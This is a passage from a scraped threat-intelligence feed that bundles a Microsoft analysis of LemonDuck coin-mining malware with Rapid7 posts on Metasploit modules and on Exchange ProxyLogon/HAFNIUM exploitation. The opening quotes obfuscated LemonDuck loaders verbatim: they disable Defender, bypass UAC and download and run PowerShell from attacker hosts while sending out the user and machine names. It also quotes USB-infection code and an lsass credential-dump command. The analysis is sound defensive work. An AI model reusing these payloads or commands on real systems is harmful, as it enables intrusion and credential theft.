cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-26T18:52:42", "description": "## ProxyLogon\n\n\n\nMore Microsoft news this week!\n\nFirstly, a big thank you to community contributors [GreyOrder](<https://github.com/GreyOrder>), [Orange Tsai](<https://github.com/orangetw>), and [mekhalleh](<https://github.com/mekhalleh>) (RAMELLA S\u00e9bastien), who added three new [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) that allow an attacker to bypass authentication and impersonate an administrative user ([CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)) on vulnerable versions of Microsoft Exchange Server. By chaining this bug with another post-auth arbitrary-file-write vulnerability, code execution can be achieved on a vulnerable target ([CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)), allwoing an unauthenticated attacker to execute arbitrary commands.\n\nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010)\n\n## Advantech iView\n\nGreat work by our very own [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>), who added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14920>) for [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>).\n\nThis module exploits an unauthenticated configuration change vulnerability combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\\SYSTEM.\n\nThe exploit functions by first modifying the `EXPORTPATH` to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.\n\n## FortiLogger\n\nNice work by community contributor [erberkan](<https://github.com/erberkan>), who added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14830>) for [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>).\n\nThis module exploits an arbitrary file upload via an unauthenticated POST request to the "/Config/SaveUploadedHotspotLogoFile" upload path for hotspot settings of FortiLogger 4.4.2.2.\n\nFortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.\n\n## New Modules (7)\n\n * [Microsoft Exchange ProxyLogon](<https://github.com/rapid7/metasploit-framework/pull/14860>) by GreyOrder, Orange Tsai, and mekhalleh (RAMELLA S\u00e9bastien), which adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:\n\n * A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. This module leverages the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user, leveraging the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>) and also a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>).\n * [VMware View Planner Unauthenticated Log File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14875>) by wvu, Grant Willcox, and Mikhail Klyuchnikov, exploiting [CVE-2021-21978](<https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978?referrer=blog>), an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1.\n\n * [Advantech iView Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14920>) by wvu and Spencer McIntyre, which exploits [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>), allowing an unauthenticated user to make configuration changes on a remote Advantech iView server. The vulnerability can be leveraged to obtain remote code execution within the context of the server application (which runs as SYSTEM by default).\n\n * [FortiLogger Arbitrary File Upload Exploit](<https://github.com/rapid7/metasploit-framework/pull/14830>) by Berkan Er, which exploits [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>), an unauthenticated arbitrary file upload vulnerability in FortiLogger 4.4.2.2.\n\n * [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) by BITTER APT, JinQuan, KaLendsi, LiHao, MaDongZe, Spencer McIntyre, and TuXiaoYi, which exploits [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>), an LPE vulnerability in win32k.\n\n## Enhancements and features\n\n * [#14878](<https://github.com/rapid7/metasploit-framework/pull/14878>) from [jmartin-r7](<https://github.com/jmartin-r7>) The recently introduced Zeitwerk loader is now wrapped and retained in a more flexible way. Additionally `lib/msf_autoload.rb` is now marked as a singleton class to ensure that only one instance of the loader can exist at any one time. The loading process has also been broken down into separate methods to allow for additional tweaking, extension, and suppression as needed.\n\n * [#14893](<https://github.com/rapid7/metasploit-framework/pull/14893>) from [archcloudlabs](<https://github.com/archcloudlabs>) `avast_memory_dump.rb` has been updated with additional paths to check for the `avdump.exe` utility, which should help Metasploit users in cases where the tool is bundled in with other Avast software besides the standard AV solution.\n\n * [#14917](<https://github.com/rapid7/metasploit-framework/pull/14917>) from [pingport80](<https://github.com/pingport80>) The `search` command has been updated to add in the `-s` and `-r` flags. The `-s` flag allows one to search by rank, disclosure date, module name, module type, or if the module implements a check method or not. The results will be ordered in ascending order, however users can show the results in descending order by using the `-r` flag.\n\n * [#14927](<https://github.com/rapid7/metasploit-framework/pull/14927>) from [pingport80](<https://github.com/pingport80>) The Ruby scripts under `tools/exploits/*` have been rewritten so that they capture signals and handle them gracefully instead of stack tracing.\n\n * [#14938](<https://github.com/rapid7/metasploit-framework/pull/14938>) from [adfoster-r7](<https://github.com/adfoster-r7>) The `time` command has been added to `msfconsole` to allow developers to time how long certain commands take to execute.\n\n## Bugs Fixed\n\n * [#14430](<https://github.com/rapid7/metasploit-framework/pull/14430>) from [cn-kali-team](<https://github.com/cn-kali-team>) Provides feedback to the user when attempting to use UUID tracking without a DB connection.\n\n * [#14815](<https://github.com/rapid7/metasploit-framework/pull/14815>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Replaces deprecated uses of `::Rex:Socket.gethostbyname` in favor of the newer `::Rex::Socket.getaddress` functionality in preparation of Ruby 3 support.\n\n * [#14844](<https://github.com/rapid7/metasploit-framework/pull/14844>) from [dwelch-r7](<https://github.com/dwelch-r7>) This moves the on_session_open event until after the session has been bootstrapped which is necessary to expose some functionality required by plugins such as auto_add_route.\n\n * [#14879](<https://github.com/rapid7/metasploit-framework/pull/14879>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) The `ssh_login_pubkey.rb` module has been updated to support specifying the path to a private key for the `KEY_PATH` option, and to improve error handling in several places to reduce stack traces and make error messages are more understandable.\n\n * [#14896](<https://github.com/rapid7/metasploit-framework/pull/14896>) from [AlanFoster](<https://github.com/AlanFoster>) The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.\n\n * [#14910](<https://github.com/rapid7/metasploit-framework/pull/14910>) from [friedrico](<https://github.com/friedrico>) `filezilla_client_cred.rb` has been updated to prevent it from falsely identifying strings as being Base64 encoded when they are not. The new code now checks that the string is marked as being Base64 encoded before attempting to decode it.\n\n * [#14912](<https://github.com/rapid7/metasploit-framework/pull/14912>) from [bcoles](<https://github.com/bcoles>) The `netgear_r6700_pass_reset.rb` module has been updated to fix a typo that could occasionally cause the `check` function to fail, and to fix a stack trace caused by calling a method on a `nil` object.\n\n * [#14930](<https://github.com/rapid7/metasploit-framework/pull/14930>) from [adfoster-r7](<https://github.com/adfoster-r7>) This fixes a bug where the highlighting in msfconsole's search command would break when the search term was certain single letter queries.\n\n * [#14934](<https://github.com/rapid7/metasploit-framework/pull/14934>) from [timwr](<https://github.com/timwr>) A bug has been addressed whereby the `download` command in Meterpreter, if run on a directory containing UTF-8 characters, would result in an error. This has been resolved by enforcing the correct encoding.\n\n * [#14941](<https://github.com/rapid7/metasploit-framework/pull/14941>) from [dwelch-r7](<https://github.com/dwelch-r7>) The `smb_relay` module has been updated to force the use of `Rex::Proto::SMB::Client`, which fixes several issues that were being encountered due to the module accidentally using `ruby_smb` vs `Rex::Proto::SMB::Client`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-18T09%3A30%3A28-05%3A00..2021-03-25T11%3A07%3A15-05%3A00%22>)\n * [Full diff 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/compare/6.0.36...6.0.37>) \nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-26T17:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732", "CVE-2021-21978", "CVE-2021-22652", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-3378"], "modified": "2021-03-26T17:36:13", "id": "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "href": "https://blog.rapid7.com/2021/03/26/metasploit-wrap-up-104/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nStarting February 27, 2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) identified multiple, related compromises in the past 72 hours. In most cases, the attacker is uploading an \u201ceval\u201d webshell, commonly referred to as a \u201cchopper\u201d or \u201cChina chopper\u201d. With this foothold, the attacker would then upload and execute tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.\n\n## **Summary**\n\nAt close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:\n\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\nUpon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible to the public Internet. Exposing web services to the public internet is a common practice for customers with on-premise instances of Microsoft Exchange to provide their users with email services over the web through Outlook Web Access (OWA). \n\nUsing Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: Nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet. \n\n\n\nWith the compromise identified, our team of Customer Advisors alerted our customers to this activity. Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR along with collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack . Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.\n\nThree days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as \"hafnium.\" They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).\n\nDespite this vulnerability being unknown to the public, Rapid7 was able to identify the attacker's presence on systems to help defend against the use of these 0-day exploits with our Attacker Behavior Analytics library.\n\n**Rapid7 recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**\n\n## **Technical Analysis of Attacker Activity**\n\n 1. Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:\n * 165.232.154.116\n * 157.230.221.198\n * 161.35.45.41\n\n2\\. Analysis of Internet Information Services (IIS) logs shows a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:\n\n * /ecp/y.js\n * /rpc/\n * /owa/auth/signon.aspx\n * /aspnet_client/system_web/<random_name>.aspx\n * IIS Path ex: /aspnet_client/system_web/TInpB9PE.aspx\n * File system path ex: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\TInpB9PE.aspx\n * /aspnet_client/aspnet_iisstart.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_iisstart.aspx\n * /aspnet_client/aspx_client.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_client.aspx\n * /aspnet_client/aspnet.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\n\nIn some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests in the following locations:\n\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\root\\\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\owa\\\n\n3\\. Next, a command executes, attempting to delete the \u201cAdministrator\u201d from the \u201cExchange Organization administrators\u201d group:\n\n * cmd /c cd /d C:\\\\\\inetpub\\\\\\wwwroot\\\\\\aspnet_client\\\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n\n4\\. With the command executed, and the webshell successfully uploaded, interaction with the webshell will begin from a different IP. \n\n * We have monitored interaction from 45.77.252[.]175\n\n5\\. Following the POST request, multiple commands are executed on the asset:\n\na. Lsass.exe dumping using procdump64.exe and C:\\Temp\\update.exe \n(MD5:[ f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):\n\n * cmd /c cd /d C:\\\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n\nb. Reconnaissance commands:\n\n * whoami.exe\n * ping.exe\n * tasklist.exe\n * quser.exe\n * query.exe\n\n****Indicators Of Compromise (IOCs)****\n\nType | Value \n---|--- \nIP Address | 165.232.154.116 \nIP Address | 157.230.221.198 \nIP Address | 161.35.45.41 \nIP Address | 45.77.252.175 \nIP Address | 104.248.49[.]97 \nIP Address That Interacts with Uploaded Webshells | 194.87.69[.]35 \nURL | /ecp/y.js \nURL | /ecp/DDI/DDIService.svc/GetList \nURL | /ecp/DDI/DDIService.svc/SetObject \nURL | /owa/auth/errorEE.aspx \nURL | /owa/auth/logon.aspx \nURL | /owa/auth/errorFE.aspx \nURL | /aspnet_client/aa.aspx \nURL | /aspnet_client/iis \nURL | /iistart.aaa \nURL | /owa/iistart.aaa \nUser Agent | python-requests/2.25.1 \nUser Agent | antSword/v2.1 \n \n## **References**\n\n * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>\n * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>\n\n## Update: March 7, 2021\n\nMicrosoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR\u2019s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:\n\n * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)\n * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)\n * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)\n * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)\n\nThese previously existing detections are based on observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.\n\n## Update March 18, 2021\n\nWidespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a \"One-Click Exchange On-premises Mitigation Tool\" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended \"to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\" They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post: _\n\n * _Robert Knapp_\n * _Shazan Khaja_\n * _Lih Wern Wong _\n * _Tiffany Anders _\n * _Andrew Iwamaye _\n * _Rashmi Joshi_\n * _Daniel Lydon_\n * _Dan Kelly_\n * _Carlo Anez Mazurco_\n * _Eoin Miller_\n * _Charlie Stafford_\n * _The Rapid7 MVM Team_", "cvss3": {}, "published": "2021-03-03T00:41:04", "type": "rapid7blog", "title": "Rapid7\u2019s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T00:41:04", "id": "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "href": "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by 